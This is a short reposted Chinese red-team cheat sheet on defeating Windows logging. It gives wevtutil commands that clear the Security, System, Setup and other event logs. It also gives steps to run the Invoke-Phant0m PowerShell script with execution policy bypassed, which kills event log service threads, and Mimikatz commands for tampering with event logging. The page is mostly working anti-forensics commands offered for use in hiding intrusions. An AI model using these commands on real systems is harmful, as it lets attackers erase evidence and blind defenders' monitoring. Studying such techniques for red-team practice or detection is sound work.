码迷,mamicode.com
首页 > 其他好文 > 详细

红队绕过日志检查

时间:2021-06-28 17:55:05      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:nts   containe   debug   ant   ati   contain   eve   github   日志   

  • 命令:wevtutil cl 日志类型

     wevtutil cl security
     wevtutil cl Setup
     wevtutil cl System
     wevtutil cl Aplication
     wevtutil cl Forwarded Events
  • 使用Phantom 工具

    该脚本遍历事件日志服务进程(特定于svchost.exe)的线程堆栈,并标识事件日志线程以杀死事件日志服务线程。因此,系统将无法收集日志,同时,事件日志服务也正在运行。

     github:https://github.com/hlldz/Invoke-Phant0m
    1 powershell -ep bypass
    2  .\Invoke-Phant0m.ps1
  • Mimikatz

    1 privilege::debug
    2  event::

     

红队绕过日志检查

标签:nts   containe   debug   ant   ati   contain   eve   github   日志   

原文地址:https://www.cnblogs.com/ashell/p/14932665.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!